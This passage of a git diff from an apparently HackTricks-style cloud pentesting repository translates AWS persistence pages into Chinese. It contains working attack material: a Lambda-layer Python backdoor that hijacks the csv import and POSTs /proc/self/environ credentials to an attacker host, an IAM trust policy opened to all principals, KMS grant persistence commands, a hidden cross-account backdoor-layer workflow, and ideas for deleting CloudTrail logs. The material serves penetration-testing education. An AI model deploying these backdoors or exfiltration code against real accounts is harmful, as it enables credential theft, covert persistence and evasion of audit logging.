An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. +> TODO: 测试 +Elastic Beanstalk 提供生命周期钩子,允许您在实例配置和终止期间运行自定义脚本。攻击者可以 **配置生命周期钩子以定期执行一个脚本,提取数据或保持对 AWS 账户的访问**。 ```bash bashCopy code# Attacker creates a script that exfiltrates data and maintains access echo '#!/bin/bash @@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo # Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook echo 'Resources: - AWSEBAutoScalingGroup: - Metadata: - AWS::ElasticBeanstalk::Ext: - TriggerConfiguration: - triggers: - - name: stealthy-lifecycle-hook - events: - - "autoscaling:EC2_INSTANCE_LAUNCH" - - "autoscaling:EC2_INSTANCE_TERMINATE" - target: - ref: "AWS::ElasticBeanstalk::Environment" - arn: - Fn::GetAtt: - - "AWS::ElasticBeanstalk::Environment" - - "Arn" - stealthyLifecycleHook: - Type: AWS::AutoScaling::LifecycleHook - Properties: - AutoScalingGroupName: - Ref: AWSEBAutoScalingGroup - LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING - NotificationTargetARN: - Ref: stealthy-lifecycle-hook - RoleARN: - Fn::GetAtt: - - AWSEBAutoScalingGroup - - Arn' > stealthy_lifecycle_hook.yaml +AWSEBAutoScalingGroup: +Metadata: +AWS::ElasticBeanstalk::Ext: +TriggerConfiguration: +triggers: +- name: stealthy-lifecycle-hook +events: +- "autoscaling:EC2_INSTANCE_LAUNCH" +- "autoscaling:EC2_INSTANCE_TERMINATE" +target: +ref: "AWS::ElasticBeanstalk::Environment" +arn: +Fn::GetAtt: +- "AWS::ElasticBeanstalk::Environment" +- "Arn" +stealthyLifecycleHook: +Type: AWS::AutoScaling::LifecycleHook +Properties: +AutoScalingGroupName: +Ref: AWSEBAutoScalingGroup +LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING +NotificationTargetARN: +Ref: stealthy-lifecycle-hook +RoleARN: +Fn::GetAtt: +- AWSEBAutoScalingGroup +- Arn' > stealthy_lifecycle_hook.yaml # Attacker applies the new environment configuration aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md index e3e1944e7..dbd67c1a0 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md @@ -1,53 +1,47 @@ -# AWS - IAM Persistence +# AWS - IAM 持久性 {{#include ../../../banners/hacktricks-training.md}} ## IAM -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### Common IAM Persistence +### 常见的 IAM 持久性 -- Create a user -- Add a controlled user to a privileged group -- Create access keys (of the new user or of all users) -- Grant extra permissions to controlled users/groups (attached policies or inline policies) -- Disable MFA / Add you own MFA device -- Create a Role Chain Juggling situation (more on this below in STS persistence) +- 创建用户 +- 将受控用户添加到特权组 +- 创建访问密钥(新用户或所有用户的访问密钥) +- 授予受控用户/组额外权限(附加策略或内联策略) +- 禁用 MFA / 添加您自己的 MFA 设备 +- 创建角色链 juggling 情况(有关更多信息,请参见下面的 STS 持久性) -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): +### 后门角色信任策略 
+您可以后门信任策略,以便能够假设它用于由您控制的外部资源(或对所有人): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": ["*", "arn:aws:iam::123213123123:root"] - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": ["*", "arn:aws:iam::123213123123:root"] +}, +"Action": "sts:AssumeRole" +} +] } ``` +### 后门策略版本 -### Backdoor Policy Version +将管理员权限授予一个不是最后版本的策略(最后版本应该看起来合法),然后将该版本的策略分配给一个受控用户/组。 -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. +### 后门 / 创建身份提供者 -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. +如果账户已经信任一个常见的身份提供者(如Github),则可以增加信任的条件,以便攻击者可以利用它们。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md index 7aefbd410..b8bdf0792 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md @@ -1,43 +1,37 @@ -# AWS - KMS Persistence +# AWS - KMS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## KMS -For mor information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Grant acces via KMS policies +### 通过 KMS 策略授予访问权限 -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. +攻击者可以使用权限 **`kms:PutKeyPolicy`** 来 **授予访问** 一个密钥给他控制的用户或甚至是一个外部账户。有关更多信息,请查看 [**KMS 权限提升页面**](../aws-privilege-escalation/aws-kms-privesc.md)。 -### Eternal Grant +### 永久授权 -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. +授权是另一种方式,可以让主体对特定密钥拥有一些权限。可以授予一个授权,允许用户创建授权。此外,用户可以对同一个密钥拥有多个授权(甚至是相同的)。 -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. 
- -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) +因此,用户可以拥有 10 个具有所有权限的授权。攻击者应该不断监控这一点。如果在某个时刻 1 个授权被移除,应该生成另外 10 个授权。 +(我们使用 10 而不是 2,以便能够检测到一个授权被移除,而用户仍然拥有一些授权) ```bash # To generate grants, generate 10 like this one aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" +--key-id \ +--grantee-principal \ +--operations "CreateGrant" "Decrypt" # To monitor grants aws kms list-grants --key-id ``` - > [!NOTE] -> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) +> 授予只能从此处授予权限: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md index 1390c2d55..d2b82e30b 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md @@ -4,7 +4,7 @@ ## Lambda -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-lambda-enum.md @@ -12,7 +12,7 @@ For more information check: ### Lambda Layer Persistence -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: +可以**引入/后门一个层以在隐秘的方式下执行任意代码**,当lambda被执行时: {{#ref}} aws-lambda-layers-persistence.md @@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md ### Lambda Extension Persistence -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +利用Lambda Layers,也可以利用扩展并在lambda中持久化,同时窃取和修改请求。 {{#ref}} aws-abusing-lambda-extensions.md {{#endref}} -### Via resource policies +### 通过资源策略 -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: +可以授予外部账户对不同lambda操作(如调用或更新代码)的访问权限:
-### Versions, Aliases & Weights +### 版本、别名和权重 -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. +一个Lambda可以有**不同的版本**(每个版本有不同的代码)。\ +然后,您可以创建**不同版本的不同别名**并为每个设置不同的权重。\ +这样,攻击者可以创建一个**后门版本1**和一个**仅包含合法代码的版本2**,并**仅在1%的请求中执行版本1**以保持隐秘。
-### Version Backdoor + API Gateway +### 版本后门 + API Gateway -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked +1. 复制Lambda的原始代码 +2. **创建一个新的版本,后门化**原始代码(或仅包含恶意代码)。发布并**将该版本部署**到$LATEST +1. 调用与lambda相关的API网关以执行代码 +3. **创建一个包含原始代码的新版本**,发布并将该**版本**部署到$LATEST。 +1. 这将隐藏之前版本中的后门代码 +4. 转到API Gateway并**创建一个新的POST方法**(或选择任何其他方法),该方法将执行lambda的后门版本:`arn:aws:lambda:us-east-1::function::1` +1. 注意arn的最后部分:1 **指示函数的版本**(在此场景中,版本1将是后门版本)。 +5. 选择创建的POST方法,在操作中选择**`部署API`** +6. 现在,当您**通过POST调用函数时,您的后门**将被调用 ### Cron/Event actuator -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. +您可以使**lambda函数在某些事件发生或经过一段时间后运行**,这使得lambda成为获得持久性和避免检测的良好且常见的方法。\ +在这里,您有一些想法,可以通过创建lambdas使您的**AWS存在更加隐秘**。 -- Every time a new user is created lambda generates a new user key and send it to the attacker. -- Every time a new role is created lambda gives assume role permissions to compromised users. -- Every time new cloudtrail logs are generated, delete/alter them +- 每当创建新用户时,lambda生成一个新用户密钥并将其发送给攻击者。 +- 每当创建新角色时,lambda授予被攻陷用户假设角色的权限。 +- 每当生成新的cloudtrail日志时,删除/更改它们。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md index 71655ada0..5bcb6d4df 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md @@ -1,46 +1,42 @@ -# AWS - Abusing Lambda Extensions +# AWS - 滥用 Lambda 扩展 {{#include ../../../../banners/hacktricks-training.md}} -## Lambda Extensions +## Lambda 扩展 -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. 
+Lambda 扩展通过与各种 **监控、可观察性、安全和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda 层](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。 -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。 +- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作对齐。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。 -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). +有关 [**Lambda 扩展如何工作的更多信息,请查看文档**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)。 -### External Extension for Persistence, Stealing Requests & modifying Requests +### 持久性、窃取请求和修改请求的外部扩展 -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) +这是本文中提出的技术摘要:[https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** +发现 Lambda 运行环境中的默认 Linux 内核是使用 “**process_vm_readv**” 和 “**process_vm_writev**” 系统调用编译的。所有进程都以相同的用户 ID 运行,即使是为外部扩展创建的新进程。**这意味着外部扩展可以完全读写 Rapid 的堆内存,这是设计使然。** -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. +此外,虽然 Lambda 扩展有能力 **订阅调用事件**,但 AWS 不会向这些扩展透露原始数据。这确保了 **扩展无法访问通过 HTTP 请求传输的敏感信息**。 -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. +Init (Rapid) 进程在 [http://127.0.0.1:9001](http://127.0.0.1:9001/) 监控所有 API 请求,而 Lambda 扩展在执行任何运行时代码之前初始化并运行,但在 Rapid 之后。

![](https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png)

-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. +变量 **`AWS_LAMBDA_RUNTIME_API`** 指示 **IP** 地址和 **端口** 号,以便 **子运行时进程** 和其他扩展使用。 > [!WARNING] -> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. +> 通过将 **`AWS_LAMBDA_RUNTIME_API`** 环境变量更改为我们可以访问的 **`port`**,可以拦截 Lambda 运行时内的所有操作(**中间人攻击**)。这是可能的,因为扩展与 Rapid Init 具有相同的权限,并且系统内核允许 **修改进程内存**,从而能够更改端口号。 -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. +因为 **扩展在任何运行时代码之前运行**,修改环境变量将影响运行时进程(例如,Python、Java、Node、Ruby)在启动时的行为。此外,**在我们之后加载的扩展**,依赖于此变量,也将通过我们的扩展进行路由。此设置可能使恶意软件完全绕过安全措施或直接在运行时环境中记录扩展。

![](https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png)

-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. +工具 [**lambda-spy**](https://github.com/clearvector/lambda-spy) 被创建用于执行 **内存写入** 和 **窃取敏感信息**,从 lambda 请求、其他 **扩展** **请求** 甚至 **修改它们**。 -## References +## 参考文献 - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) - [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md index f8a5e2868..af5a1d01b 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md @@ -4,79 +4,72 @@ ## Lambda Layers -A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +Lambda 层是一个 .zip 文件归档,**可以包含额外的代码**或其他内容。一个层可以包含库、[自定义运行时](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html)、数据或配置文件。 -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +每个函数最多可以包含 **五个层**。当你在一个函数中包含一个层时,**内容会被提取到执行环境中的 `/opt`** 目录。 -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +**默认情况下**,你创建的 **层** 对你的 AWS 账户是 **私有** 的。你可以选择 **与其他账户共享** 一个层或 **将** 该层 **公开**。如果你的函数使用了其他账户发布的层,即使该层被删除或你被撤销访问权限,你的函数仍然可以 **继续使用该层版本**。但是,你不能使用已删除的层版本创建新函数或更新函数。 -Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. 
+作为容器镜像部署的函数不使用层。相反,当你构建镜像时,你将所需的运行时、库和其他依赖项打包到容器镜像中。 ### Python load path -The load path that Python will use in lambda is the following: - +Python 在 lambda 中使用的加载路径如下: ``` ['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages'] ``` - -Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** +检查 **第二** 和 **第三** **位置** 是否被 **lambda layers** 解压其文件的目录占用: **`/opt/python/lib/python3.9/site-packages`** 和 **`/opt/python`** > [!CAUTION] -> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. +> 如果攻击者设法 **后门** 一个被使用的 lambda **layer** 或 **添加一个** 在加载常用库时会 **执行任意代码** 的层,他将能够在每次 lambda 调用时执行恶意代码。 -Therefore, the requisites are: +因此,要求是: -- **Check libraries** that are **loaded** by the victims code -- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. +- **检查库** 这些库是 **被受害者代码加载的** +- 创建一个 **带有 lambda layers 的代理库**,该库将 **执行自定义代码** 并 **加载原始** 库。 -### Preloaded libraries +### 预加载的库 > [!WARNING] -> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ -> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. 
- -With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: +> 在滥用此技术时,我发现了一个困难:一些库在你的代码执行时已经在 python 运行时中 **被加载**。我原本期待找到像 `os` 或 `sys` 这样的东西,但 **甚至 `json` 库也被加载**。\ +> 为了滥用这种持久性技术,代码需要 **加载一个在代码执行时未加载的新库**。 +使用这样的 python 代码,可以获得 **在 lambda 中预加载的库列表**: ```python import sys def lambda_handler(event, context): - return { - 'statusCode': 200, - 'body': str(sys.modules.keys()) - } +return { +'statusCode': 200, +'body': str(sys.modules.keys()) +} ``` - -And this is the **list** (check that libraries like `os` or `json` are already there) - +这是**列表**(检查像`os`或`json`这样的库是否已经存在) ``` 'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function' ``` +这是**lambda 默认包含的库**列表:[https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) -And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) +### Lambda Layer 后门 -### Lambda Layer Backdooring +在这个例子中,假设目标代码正在导入 **`csv`**。我们将对 **`csv` 库的导入进行后门处理**。 -In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**. 
+为此,我们将创建目录 **csv**,并在其中放置文件 **`__init__.py`**,路径为 lambda 加载的路径:**`/opt/python/lib/python3.9/site-packages`**\ +然后,当 lambda 执行并尝试加载 **csv** 时,我们的 **`__init__.py` 文件将被加载并执行**。\ +该文件必须: -For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\ -Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ -This file must: - -- Execute our payload -- Load the original csv library - -We can do both with: +- 执行我们的有效载荷 +- 加载原始的 csv 库 +我们可以通过以下方式同时完成这两项: ```python import sys from urllib import request with open("/proc/self/environ", "rb") as file: - url= "https://attacker13123344.com/" #Change this to your server - req = request.Request(url, data=file.read(), method="POST") - response = request.urlopen(req) +url= "https://attacker13123344.com/" #Change this to your server +req = request.Request(url, data=file.read(), method="POST") +response = request.urlopen(req) # Remove backdoor directory from path to load original library del_path_dir = "/".join(__file__.split("/")[:-2]) @@ -90,29 +83,27 @@ import csv as _csv sys.modules["csv"] = _csv ``` +然后,创建一个 zip 文件,包含此代码,路径为 **`python/lib/python3.9/site-packages/__init__.py`**,并将其添加为 lambda 层。 -Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer. +您可以在 [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) 找到此代码。 -You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) - -The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: +集成的有效载荷将在 **首次调用或在 lambda 容器重置后**(代码更改或冷 lambda)**发送 IAM 凭证到服务器**,但 **其他技术**(如以下内容)也可以集成: {{#ref}} ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -### External Layers +### 外部层 -Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\ -Also note that the **max number of layers a lambda can have is 5**. +请注意,可以使用 **来自外部账户的 lambda 层**。此外,即使没有权限,lambda 也可以使用来自外部账户的层。\ +还要注意,**一个 lambda 最多可以有 5 个层**。 -Therefore, in order to improve the versatility of this technique an attacker could: - -- Backdoor an existing layer of the user (nothing is external) -- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. 
- - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) - - The victim **won't see external layers** used with **`aws lambda list-layers`** +因此,为了提高此技术的灵活性,攻击者可以: +- 在用户的现有层中植入后门(没有任何外部内容) +- **在他的账户中创建**一个**层**,给予**受害者账户使用**该层的权限,**配置**受害者的 Lambda 中的**层**并**移除权限**。 +- **Lambda** 仍然能够**使用该层**,而**受害者**将没有任何简单的方法来**下载层代码**(除了在 lambda 内部获取反向 shell) +- 受害者**不会看到**使用 **`aws lambda list-layers`** 的外部层 ```bash # Upload backdoor layer aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" @@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen # Remove permissions aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md index 88b0d082a..03372a14f 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md @@ -4,34 +4,30 @@ ## Lightsail -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} -### Download Instance SSH keys & DB passwords +### 下载实例 SSH 密钥和数据库密码 -They won't be changed probably so just having them is a good option for persistence +它们可能不会被更改,因此拥有它们是持久性的一个好选择 -### Backdoor Instances +### 后门实例 -An attacker could get access to the instances and backdoor them: +攻击者可以访问实例并对其进行后门操作: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** -- Expose a port with port knocking with a backdoor +- 例如使用传统的 **rootkit** +- 添加新的 **公共 SSH 密钥** +- 使用后门暴露一个端口并进行端口敲击 -### DNS persistence +### DNS 持久性 -If domains are configured: +如果域名已配置: -- Create a subdomain pointing your IP so you will have a **subdomain takeover** -- Create **SPF** record allowing you to send **emails** from the domain -- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones +- 创建一个指向您的 IP 的子域,以便您将拥有 **子域接管** +- 创建 **SPF** 记录,允许您从该域发送 **电子邮件** +- 将 **主域 IP 配置为您自己的 IP**,并从您的 IP 对合法 IP 执行 **MitM** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md index b7a4b8f7b..0d3859920 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md @@ -1,35 +1,27 @@ -# AWS - RDS Persistence +# AWS - RDS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. 
